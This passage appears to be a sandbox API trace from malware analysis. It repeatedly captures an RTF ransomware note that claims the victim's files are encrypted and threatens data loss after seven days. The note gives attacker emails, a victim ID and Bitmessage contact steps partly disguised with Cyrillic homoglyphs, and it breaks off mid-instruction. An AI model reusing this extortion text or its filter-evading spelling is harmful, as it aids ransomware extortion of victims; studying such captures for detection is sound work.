CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0221.469] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0221.469] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4da18, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w 